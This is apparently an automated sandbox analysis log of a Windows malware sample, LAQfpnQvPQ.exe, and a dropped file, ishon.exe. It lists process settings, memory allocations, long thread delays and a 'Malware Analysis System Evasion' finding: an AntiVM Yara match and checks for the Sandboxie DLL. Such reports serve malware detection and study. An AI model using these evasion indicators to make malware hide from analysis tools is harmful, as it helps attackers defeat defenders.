                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2219471547.000000000320E000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2504335246.000000000326E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeMemory allocated: 17E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeMemory allocated: 3160000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeMemory allocated: 5160000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeMemory allocated: 2E40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory allocated: 1340000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory allocated: 31C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599890Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599669Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599526Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599406Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599297Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599179Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599072Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598953Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598844Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598734Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598624Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598515Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598406Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598297Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598187Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598078Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597968Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597859Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597749Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597640Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597531Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597422Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597297Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597153Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596779Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596637Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596531Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596422Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596312Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596203Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596093Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595984Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595875Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595765Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595656Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595547Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595437Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595328Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595218Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595109Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595000Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594890Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594781Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594672Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594561Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594453Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594343Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594230Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594089Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 593967Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 593859Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599812Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599702Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599593Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599484Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599373Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599265Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599155Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599047Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598937Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598828Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598718Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598609Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598499Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598390Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598281Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598171Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598062Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597953Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597843Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597734Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597623Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597515Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597405Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597253Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596984Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596874Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596547Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596437Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596328Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596218Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596109Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595890Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595781Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595671Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595453Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595342Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595234Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595124Jump to behavior
